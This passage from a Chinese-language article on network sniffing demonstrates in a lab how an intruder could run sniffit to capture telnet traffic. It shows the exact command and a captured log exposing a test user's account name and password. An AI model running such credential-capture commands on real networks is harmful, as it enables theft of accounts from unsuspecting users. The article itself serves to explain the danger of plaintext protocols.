由这个试验,我们可以看到,网络监听手段,对网络的系统管理员是非常有价值的。
邪道:非法窃取账号、口令
然而,对入侵者呢?与管理员感兴趣的是对数据包进行分析不同,入侵者,感兴趣的是数据包的内容,尤其是账号,口令等敏感内容。
我们模仿入侵者在主机上跑一个上面提到的sniffit软件,监听本机发出去的所有telnet数据,如下:server#./sniffit-A.-p23-sserver
同时,我们模仿一个用户yiming登录一台client机器,
client
Trying192.168.1.1...
Connectedto192.168.1.1
Escapecharacteris'^]'.
login:yiming
Password:
SunMicrosystemsInc.SunOS5.7GenericOctober1998
$ls
baklost+foundprojectwangguan
libcapnmssnmpwglist
$pwd
/yiming
$
我们看到这个用户telnet到client机器,输入账号口令,执行了ls,pwd命令,
此时看看sniffit的记录文件记录了什么,
server#moreserver.32780-client.23
.............!.."..'.......h.7....#..$....VT100....'.........yiming..Power^man!..ls..pwd..
我们看到了账号yiming,密码Power^man!,还有登录后操作的命令。请注意一点,yiming这个用户尽管设置了非常复杂的密码,但对网络监听而言,是没有丝毫意义的。
其实除了截获telnet密码这样的功能外,专用的网络监听软件从密码到邮件,浏览的网页等内容,无所不包,但由于本文不是介绍网络监听软件用途的,因此这里不详细叙述各种监听软件的使用方法,有兴趣的读者可以参照各个软件的readme等文件,很简单。